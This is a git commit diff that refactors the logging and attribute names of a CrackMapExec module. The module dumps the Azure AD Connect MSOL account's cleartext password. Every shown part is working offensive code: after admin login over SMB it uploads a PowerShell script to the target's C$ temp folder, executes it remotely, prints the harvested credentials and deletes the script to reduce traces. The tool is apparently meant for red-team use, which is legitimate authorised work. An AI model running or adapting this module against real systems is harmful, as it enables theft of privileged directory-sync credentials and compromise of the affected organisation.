update msol module logging
parent
083550846a
commit
edb85f382e
|
@ -1,79 +1,88 @@
|
||||||
# MSOL module for CME
|
# MSOL module for CME
|
||||||
# Author of the module : https://twitter.com/Daahtk
|
# Author of the module : https://twitter.com/Daahtk
|
||||||
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
||||||
|
|
||||||
from base64 import b64decode
|
|
||||||
from sys import exit
|
from sys import exit
|
||||||
from os import path
|
from os import path
|
||||||
|
from cme.helpers.powershell import get_ps_script
|
||||||
|
|
||||||
|
|
||||||
class CMEModule:
|
class CMEModule:
|
||||||
|
name = "msol"
|
||||||
|
description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server"
|
||||||
|
supported_protocols = ["smb"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
name = 'msol'
|
def __init__(self, context=None, module_options=None):
|
||||||
description = 'Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server'
|
self.use_embedded = None
|
||||||
supported_protocols = ['smb']
|
self.MSOL_PS1 = None
|
||||||
opsec_safe = True
|
self.msol_embedded = None
|
||||||
multiple_hosts = True
|
self.cmd = None
|
||||||
|
self.msolmdl = None
|
||||||
|
self.msol = None
|
||||||
|
self.tmp_share = None
|
||||||
|
self.share = None
|
||||||
|
self.tmp_dir = None
|
||||||
|
self.context = context
|
||||||
|
self.module_options = module_options
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
'''
|
"""
|
||||||
MSOL_PS1 // Path to the msol binary on your computer
|
MSOL_PS1 // Path to the msol binary on your computer
|
||||||
'''
|
"""
|
||||||
|
self.tmp_dir = "C:\\Windows\\Temp\\"
|
||||||
|
self.share = "C$"
|
||||||
|
self.tmp_share = self.tmp_dir.split(":")[1]
|
||||||
|
self.msol = "msol.ps1"
|
||||||
|
self.use_embedded = True
|
||||||
|
self.msolmdl = self.cmd = ""
|
||||||
|
|
||||||
self.tmp_dir = "C:\\Windows\\Temp\\"
|
with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc:
|
||||||
self.share = "C$"
|
self.msol_embedded = msolsc.read()
|
||||||
self.tmp_share = self.tmp_dir.split(":")[1]
|
|
||||||
self.msol = "msol.ps1"
|
|
||||||
self.useembeded = True
|
|
||||||
self.msolmdl = self.cmd = ""
|
|
||||||
|
|
||||||
with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc:
|
if "MSOL_PS1" in module_options:
|
||||||
self.msol_embedded = msolsc.read()
|
self.MSOL_PS1 = module_options["MSOL_PS1"]
|
||||||
|
self.use_embedded = False
|
||||||
|
|
||||||
if "MSOL_PS1" in module_options:
|
def exec_script(self, _, connection):
|
||||||
self.MSOL_PS1 = module_options["MSOL_PS1"]
|
|
||||||
self.useembeded = False
|
|
||||||
|
|
||||||
|
|
||||||
def execscript(self, _, connection):
|
|
||||||
command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1"
|
command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1"
|
||||||
return connection.execute(command, True)
|
return connection.execute(command, True)
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
|
||||||
|
|
||||||
if self.useembeded:
|
def on_admin_login(self, context, connection):
|
||||||
|
if self.use_embedded:
|
||||||
file_to_upload = "/tmp/msol.ps1"
|
file_to_upload = "/tmp/msol.ps1"
|
||||||
with open(file_to_upload, 'w') as msol:
|
with open(file_to_upload, 'w') as msol:
|
||||||
msol.write(self.msol_embedded)
|
msol.write(self.msol_embedded)
|
||||||
else:
|
else:
|
||||||
if path.isfile(self.MSOL_PS1):
|
if path.isfile(self.MSOL_PS1):
|
||||||
file_to_upload = self.MSOL_PS1
|
file_to_upload = self.MSOL_PS1
|
||||||
else:
|
else:
|
||||||
context.log.error(f"Cannot open {self.MSOL_PS1}")
|
context.log.fail(f"Cannot open {self.MSOL_PS1}")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
context.log.display(f"Uploading {self.msol}")
|
context.log.display(f"Uploading {self.msol}")
|
||||||
with open(file_to_upload, 'rb') as msol:
|
with open(file_to_upload, 'rb') as msol:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
||||||
context.log.success(f"Msol script successfully uploaded")
|
context.log.success(f"Msol script successfully uploaded")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error(f"Error writing file to share {self.tmp_share}: {e}")
|
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
if self.cmd == "":
|
if self.cmd == "":
|
||||||
context.log.display(f"Executing the script")
|
context.log.display(f"Executing the script")
|
||||||
p = self.execscript(context, connection)
|
p = self.exec_script(context, connection)
|
||||||
for line in p.splitlines():
|
for line in p.splitlines():
|
||||||
p1, p2 = line.split(" ", 1)
|
p1, p2 = line.split(" ", 1)
|
||||||
context.log.highlight(f"{p1} {p2}")
|
context.log.highlight(f"{p1} {p2}")
|
||||||
else :
|
else:
|
||||||
context.log.error(f"Script Execution Impossible")
|
context.log.fail(f"Script Execution Impossible")
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error(f"Error runing command: {e}")
|
context.log.fail(f"Error running command: {e}")
|
||||||
finally:
|
finally:
|
||||||
try:
|
try:
|
||||||
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
||||||
context.log.success(f"Msol script successfully deleted")
|
context.log.success(f"Msol script successfully deleted")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error(f"Error deleting msol script on {self.share}: {e}")
|
context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
|
||||||
|
|
Loading…
Reference in New Issue